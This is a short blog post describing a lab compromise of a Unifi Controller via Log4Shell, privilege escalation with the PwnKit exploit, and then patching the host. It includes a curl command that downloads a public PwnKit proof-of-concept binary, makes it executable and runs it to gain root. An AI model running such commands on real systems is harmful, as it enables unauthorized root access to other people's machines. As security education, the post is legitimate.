CyberMattLee CyberMattLee

Pwn’d or Patched, you choose. Unifi, Log4J, and PwnKit

Written by Matt Lee  |  CIS 7, Cybersecurity  | 

Log4J and PwnKit

Pwn’d or Patched using CVE 2021-44228 (Log4Shell) and CVE 2021-4034 (PwnKit)

The earlier video –

If you read my initial writeup on the Unifi unpatched status you will know this is still a HUGE issue that needs to be solved.

The new stuff Pwn’d or Patched, you choose –

I have recorded a video walkthrough of the post comprimisation steps here.

The setup – Compromising with CVE 2021-44228 (Log4Shell)

Initially I followed a great guide by Sprocket Security on compromising the Unifi Controller with CVE-2021-44228. That guide walked through gaining access and then amazing work on post exploitation inside the controller application, but not so much on privilege escalation directly at the point of compromise. I started wondering, with all 5,000 vulnerable Unifi Controllers out there, is there a way to compromise the controller and either make it more secure, or do very malicious things within that network or underlying supported services.. Guess what….. YES THERE IS… But I am going to do the good thing! (Caveat, I own this controller it is in a lab. Public IPs but no assets of merit)

The Code Walkthrough – Elevating Priv and Patching using CVE 2021-4034

After you have gained a foothold as described above by Sprocket Security, instead of pivoting into the Software controller, I decided to try to string together another vulnerability and that came in the form of PwnKit or CVE-2021-4034. A simple download of POC Shell code found here, written by Oliver Lyak from Denmark, provided a simple method of escalation. Here is the rough command lines used to finish the escalation:

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o ./tmp/PwnKit
cd /tmp
chmod +x ./PwnKit
./PwnKit
YOU ARE ROOT!!!

Now it is time to be the White Hat in this situation –

apt update
apt upgrade

Following the prompts I patched the vulnerabilities all at once. The unifi software update to 6.5.55 fixed the Log4Shell vulnerability and updating pollkit fixed the PwnKit vulnerability. As a result, the unifi controller is no longer vulnerable to the string and the kill chain is broken!

The takeaway –

Patch your stuff, so I dont have to. If someone with basic skills in ethical hacking can do it, the threat actors will certainly do it and likely already are.

Matt